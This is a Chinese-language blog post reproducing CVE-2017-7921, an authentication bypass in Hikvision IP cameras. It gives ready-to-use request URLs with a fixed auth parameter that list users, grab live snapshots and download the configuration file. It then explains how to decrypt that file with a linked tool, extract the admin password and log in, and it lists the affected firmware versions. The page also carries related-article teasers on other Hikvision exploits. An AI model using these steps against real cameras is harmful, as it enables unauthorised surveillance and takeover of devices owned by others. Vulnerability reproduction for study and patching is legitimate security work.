海康威视(Hikvision) 摄像头-CVE-2017-7921漏洞复现

最新推荐文章于 2024-06-04 14:46:56 发布
最新推荐文章于 2024-06-04 14:46:56 发布
阅读量5.1k 收藏 13
点赞数 5
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_49025459/article/details/131533026
版权

漏洞描述

许多HikvisionIP摄像机包含一个后门,允许未经身份验证的模拟任何配置的用户帐户。

漏洞复现

访问漏洞url

 检索用户与用户列表

ttp://your-ip/Security/users?auth=YWRtaW46MTEK

 从下图可知该摄像只有admin一个账户

 获取监控快照

http://your-ip/onvif-http/snapshot?auth=YWRtaW46MTEK

 下载摄像头配置账号密码文件

http://your-ip/System/configurationFile?auth=YWRtaW46MTEK

输入之后浏览器会自动下载一个名为configurationFile的文件

 

配置文件解密获取密码 

海康威视配置文件解密工具下载地址:https://github.com/WormChickenWizard/hikvision-decrypter

点开软件即可使用

具体操作步骤如下点击红框部分导入我们下载的配置文件

 选择解密

按照如图顺序保存文件

保存成txt文件格式就行,然后使用任意十六进编辑器打开即可,然后搜索admin(之前找到的账户) 

使用账户密码就可以登录web界面了

 漏洞影响版本

HikvisionDS-2CD2xx2F-ISeries5.2.0build140721

版本至5.4.0build160530版本;

DS-2CD2xx0F-ISeries5.2.0build140721

版本至5.4.0Build160401版本;

DS-2CD2xx2FWDSeries5.3.1build150410

版本至5.4.4Build161125版本;

DS-2CD4x2xFWDSeries5.2.0build140721

版本至5.4.0Build160414版本;

DS-2CD4xx5Series5.2.0build140721

版本至5.4.0Build160421版本;

DS-2DFxSeries5.2.0build140805

版本至5.4.5Build160928版本;

DS-2CD63xxSeries5.0.9build140305

版本至5.3.5Build160106版本

 

 

 

 

仲瑿
关注
  • 5
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
漏洞复现Hikvision摄像头产品越权漏洞(CVE-2017-7921)
晚风不及你
01-20 1483
Hikvision海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。Hikvision的网络摄像头产品线非常丰富,涵盖了各种型号和功能,以满足不同用户的需求。
漏洞复现Hikvision摄像头产品代码执行漏洞(CVE-2021-36260)
晚风不及你
01-20 3280
Hikvision海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。Hikvision的网络摄像头产品线非常丰富,涵盖了各种型号和功能,以满足不同用户的需求。
Nday 海康综合安防管理平台存在多个漏洞、29个漏洞合集
最新发布
weixin_43167326的博客
06-04 1029
海康威视部分综合安防管理平台管理平台基于 " 统一软件技术架构" 理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、配置、管理和调度,可以对接入的视频监控点集中管理,实现统一部署、统一配置、统一管理和统一调度。
CVE-2017-7921 海康威视(Hikvision) 摄像头漏洞复现
菜鸟学渗透
05-22 8572
这是一个海康威视摄像头后台管理未授权漏洞,通过构造URL可绕过登录查看监控,检索所有用户和配置文件下载,并获取到监控后台管理账号和密码。
漏洞复现海康威视iVMS综合安防系统任意文件上传漏洞复现 (在野0day)
热门推荐
做自己喜欢的事,并将其发挥到极致!
06-02 1万+
海康威视 iVMS 集中监控应用管理平台,是以安全防范业务应用为导向,以视频图像应用为基础手段,综合视频监控、连网报警、智能分析、运维管理等多种安全防范应用系统,构建的多业务应用综合管理平台。海康威视 iVMS系统存在在野利用 0day漏洞,攻击者可通过获取密钥任意构造token,请求/resourceOperations/upload 接口任意上传文件,导致获取服务器WebShell权限,同时可远程进行恶意代码执行。
漏洞复现海康威视综合安防管理平台Fastjson远程命令执行漏洞复现
做自己喜欢的事,并将其发挥到极致!
04-28 8421
综合安防管理平台基于 统一软件技术架构 理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、配置、管理和调度。海康威视综合安防管理平台存在Fastjson远程命令执行漏洞,该漏洞可执行系统命令,可获取到目标服务器系统权限以及敏感数据信息。
【1day】复现海康综合安防管理平台 applyCT Fastjson远程命令执行漏洞
记录并分享学习安全的知识点..
07-24 678
海康威视综合安防管理平台,可以对接入的视频监控点集中管理,实现统一部署、统一配置、统一管理和统一调度,海康综合安防管理平台 applyCT 存在低版本Fastjson远程命令执行漏洞,攻击者通过漏洞可以执行任意命令获取服务器权限。
漏洞复现Hikvision综合安防管理平台config信息泄露漏洞
晚风不及你
01-21 1907
Hikvision海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。综合安防管理平台基于“统一软件技术架构”理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。
海康威视对讲广播系统 RCE漏洞复现(CVE-2023-6895)
0xSec
12-20 1460
Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞,该漏洞源于文件/php/ping.php的参数jsondata[ip]会导致操作系统命令注入。
hikvision_CVE-2017-7921配置文件解密.rar
05-20
具体影响产品型号,请参考CVE-2017-7921CVE-2017-7922漏洞详情。 该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。 本程序需和配置文件存放在同一目录下运行exe即可配置文件名...
hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip
05-20
标题 "hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip" 指向的是一个与海康威视Hikvision)设备相关的安全漏洞,具体是CVE-2017-7921认证绕过漏洞。这个压缩包可能包含一个工具或指南,用于解析...
hikvision.zip
07-01
海康威视摄像头sdk二次开发布防报警回调,maven工程,导入即用(examples的jar包需要maven打入本地库或者单独引用依赖)
CVE-2017-7921海康威视配置文件解码(configfile解码)
12-11
该程序可以提取由于授权问题影响的多款Hikvision产品的configfile文件中的管理员账号密码。具体影响产品型号,请参考CVE-2017-7921CVE-2017-7922漏洞详情。该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。(ps:工具不会使用可以私信我,直接差评的一律自理)
海康威视越权访问CVE-2021-7921漏洞复现
归零者的博客
10-31 4611
海康威视越权访问CVE-2021-7921漏洞复现
允许攻击者访问视频流:D-Link摄像头漏洞分析
systemino的博客
05-05 1385
概述 对于许多人来说,都希望通过安装“智能”摄像头,来提高家庭或办公室的安全性。一旦这些设备直接连接到互联网,只需点击几下,用户就可以轻松查看他们的监控视频流。然而,如果摄像头受到安全漏洞的影响,那么这种“便利性”将很快变成薄弱点,会给未经授权的攻击者打开大门。正如ESET智能家居研究团队的研究结果所显示的,D-Link DCS-2132L云端摄像头就正在面临这样的情况。该摄像头存在一系列安全漏...
黑客真的能入侵你的摄像头吗?
分享Python知识
07-07 634
黑客真的能入侵你的摄像头吗?
HIKVISION海康威视代码执行漏洞复现(CVE-2021-36260)
红队是青春
01-27 6140
CVE-2021-36260,海康威视代码执行漏洞复现
海康威视摄像头ds-2cd3t10-i3连接电脑
09-15
要将海康威视摄像头DS-2CD3T10-I3连接到电脑上,您可以按照以下步骤进行操作: 1. 首先,确认您的电脑是否具备网络接口,以便与摄像头进行连接。如果您的电脑没有网络接口,您可以购买一个USB转网口的适配器。 2. 摄像头支持以太网连接,因此您需要一个以太网网线。将一端连接到摄像头的以太网口,另一端连接到电脑的以太网口或者路由器的以太网口。 3. 确保您的电脑和摄像头都在同一个局域网内。您可以通过设置您的电脑和摄像头的IP地址和子网掩码来实现。确保两者的IP地址段和子网掩码一致。 4. 打开您的电脑上的网络设置,查找并记下摄像头的IP地址。您可以使用海康威视提供的设备搜索工具来查找和配置摄像头的IP地址。 5. 打开您的电脑上的网络浏览器,输入摄像头的IP地址。您将会看到摄像头的登录页面。根据摄像头的手册,输入正确的用户名和密码进行登录。 6. 成功登录后,您就可以在浏览器中查看和控制摄像头的画面了。您可以调整摄像头的参数、查看实时视频、进行录像等操作。 请注意,以上步骤只适用于将摄像头连接到电脑进行访问和控制。如果您希望通过互联网远程访问和控制摄像头,还需要进行额外的配置,例如设置端口映射、启用动态域名解析等。建议您在操作中参考相关的摄像头手册或者咨询专业人士的帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

仲瑿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值